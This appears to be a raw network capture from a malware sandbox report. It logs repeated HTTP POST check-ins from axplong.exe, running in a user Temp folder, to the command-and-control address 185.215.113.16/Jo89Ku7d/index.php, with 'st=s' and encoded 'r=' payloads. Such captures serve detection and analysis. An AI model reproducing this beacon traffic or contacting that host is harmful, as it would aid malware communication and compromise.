                                                                  Sep 27, 2024 11:30:59.262922049 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:59.971185923 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:59.972007036 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:00.200732946 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  52192.168.2.665114185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:00.310723066 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:01.000776052 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:31:01.001719952 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:01.223706961 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:01 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  53192.168.2.665115185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:01.343229055 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:02.053611040 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:01 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:31:02.054727077 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:02.285742998 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  54192.168.2.665116185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:02.586646080 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:03.309027910 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:31:03.311400890 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:03.538702011 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  55192.168.2.665117185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:03.655917883 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:04.352302074 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:31:04.355447054 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:04.577923059 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  56192.168.2.665118185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:04.687051058 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:05.394244909 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:31:05.397620916 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:05.629041910 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  57192.168.2.665119185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:05.772352934 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:06.447398901 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  58192.168.2.665120185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:06.457762003 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:07.161418915 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  59192.168.2.665121185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:07.284039021 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:08.019320965 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  60192.168.2.665122185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:08.029510975 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:08.733987093 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  61192.168.2.665123185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:08.862838984 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:09.565476894 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:09 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  62192.168.2.665124185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:09.588495970 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:10.306952953 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  63192.168.2.665125185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:10.424969912 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:11.116766930 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  64192.168.2.665126185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:11.148034096 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:11.871057987 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  65192.168.2.665127185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:11.984565973 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  66192.168.2.665128185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:12.012002945 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:12.749566078 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
